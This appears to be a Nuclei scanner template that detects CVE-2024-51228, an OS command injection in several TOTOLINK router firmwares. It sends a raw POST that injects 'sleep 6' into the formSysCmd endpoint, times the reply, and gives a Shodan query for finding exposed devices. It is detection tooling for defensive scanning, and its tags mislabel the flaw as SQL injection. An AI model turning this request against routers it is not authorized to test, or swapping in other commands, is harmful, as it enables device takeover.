id: CVE-2024-51228

info:
  name: TOTOLINK CX-A3002RU - Remote Code Execution
  author: DhiyaneshDK
  severity: medium
  description: |
    An issue in TOTOLINK-CX-A3002RU V1.0.4-B20171106.1512 and TOTOLINK-CX-N150RT V2.1.6-B20171121.1002 and TOTOLINK-CX-N300RT V2.1.6-B20170724.1420 and TOTOLINK-CX-N300RT V2.1.8-B20171113.1408 and TOTOLINK-CX-N300RT V2.1.8-B20191010.1107 and TOTOLINK-CX-N302RE V2.0.2-B20170511.1523 allows a remote attacker to execute arbitrary code via the /boafrm/formSysCmd component.
  impact: |
    Attackers can exploit this vulnerability to compromise system security and integrity.
  remediation: |
    Apply the latest security patches and updates to address this vulnerability.
  reference:
    - https://github.com/yckuo-sdc/totolink-boa-api-vulnerabilities
    - https://totolink.tw/support_view/A3002RU
    - https://totolink.tw/support_view/N150RT
    - https://www.totolink.tw/products_view/N300RT
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 6.8
    cve-id: CVE-2024-51228
    cwe-id: CWE-78
    epss-score: 0.0379
    epss-percentile: 0.88563
  metadata:
    max-request: 1
    shodan-query: html:"TOTOLINK"
  tags: cve,cve2024,totolink,time-based-sqli,sqli,vuln,vkev

http:
  - raw:
      - |
        POST /boafrm/formSysCmd HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        sysCmd=sleep%206

    matchers:
      - type: dsl
        dsl:
          - "duration>=6"
          - 'contains(server,"Boa/0.94")'
          - "status_code == 302"
        condition: and
# digest: 490a004630440220697dd4b5dad8070ab61799f468bccd77f0c2d96852e881cd3ddfb86b0ab215e7022054a4c8a742cf1ed5a6b7e745a5147520b9d4fa35398707dc214bd6d696ed5eda:922c64590222798bb761d5b6d8e72950